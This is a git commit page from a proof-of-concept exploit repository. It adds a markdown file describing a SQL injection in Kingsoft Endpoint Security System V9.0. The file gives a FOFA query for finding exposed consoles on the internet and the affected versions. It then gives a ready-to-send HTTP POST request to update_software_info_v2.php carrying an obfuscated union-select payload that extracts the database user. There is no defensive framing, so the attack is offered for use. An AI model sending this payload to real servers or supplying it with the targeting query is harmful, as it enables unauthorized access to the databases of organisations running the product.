admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 金山终端安全系统V9.0 SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2023-10-21 09:30:44 +08:00 committed by GitHub
parent 6419808fae
commit fc8c38e36c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
金山终端安全系统V9.0 SQL注入漏洞.md Normal file
View File

@ -0,0 +1,19 @@
## 金山终端安全系统V9.0 SQL注入漏洞
## fofa查询语法
```
app="金山终端安全系统V9.0Web控制台"
```
## 影响版本
金山终端安全系统 V9.0 < V9.SP1.E1008
## POC
```
POST /inter/update_software_info_v2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ip:port
Content-Length: 81
type=--1E0union/**/se#lect-1E0,2,1,user(),5,6,7,8--&key=123&pageCount=1&curPage=1
```